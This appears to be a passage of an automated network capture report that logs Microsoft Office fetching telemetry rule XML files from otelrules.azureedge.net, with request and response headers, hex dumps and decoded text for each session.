                                                                                                                                                                                            2024-11-20 20:05:31 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            83192.168.2.44987913.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:31 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:31 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB464F255"
                                                                                                                                                                                            x-ms-request-id: 5c5a59ff-301e-003f-5b8c-3a266f000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200531Z-r1d97b9957744xz5hC1TEB5bf800000009ag0000000002q3
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:31 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            84192.168.2.44987713.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:32 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:32 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 432
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                            ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                            x-ms-request-id: de17e165-601e-0002-3161-3ba786000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200532Z-185f5d8b95c5lcmhhC1NYCsnsw0000000aug0000000094tr
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:32 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            85192.168.2.44988013.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:33 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:33 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                            ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                            x-ms-request-id: 4f8e9926-c01e-00ad-7c8c-3aa2b9000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200533Z-1777c6cb754mrj2shC1TEB6k7w0000000a7g000000009dp6
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:33 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            86192.168.2.44988113.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:33 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:33 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                            ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                            x-ms-request-id: 38897bff-401e-000a-368c-3a4a7b000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200533Z-r1d97b99577sdxndhC1TEBec5n00000009gg0000000055px
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:34 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            87192.168.2.44988313.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:33 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:33 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 405
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                            ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                            x-ms-request-id: d7880247-601e-0070-328c-3aa0c9000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200533Z-r1d97b9957789nh9hC1TEBxha800000009fg00000000arsr
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:34 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            88192.168.2.44988213.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:33 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:34 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:33 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                            ETag: "0x8DC582B984BF177"
                                                                                                                                                                                            x-ms-request-id: 1a92378f-b01e-005c-6f7b-3b4c66000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200533Z-1777c6cb754wcxkwhC1TEB3c6w00000009z000000000fyc5
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:34 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            89192.168.2.44988413.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:34 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:34 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                            ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                            x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200534Z-1777c6cb754mrj2shC1TEB6k7w0000000a5000000000kd8s
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:34 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            90192.168.2.44988513.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:35 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:35 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:35 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 174
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                            ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                            x-ms-request-id: 6a968014-801e-0015-537c-3bf97f000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200535Z-178bfbc474btvfdfhC1NYCa2en00000000gg000000005qhn
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:35 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            91192.168.2.44988613.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:35 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:36 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1952
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                            ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                            x-ms-request-id: b992c0cc-401e-0048-5ef2-3a0409000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200536Z-r1d97b99577tssmjhC1TEB8kan000000095000000000m0ty
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:36 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            92192.168.2.44988813.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:35 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:36 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 501
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                            ETag: "0x8DC582BACFDAACD"
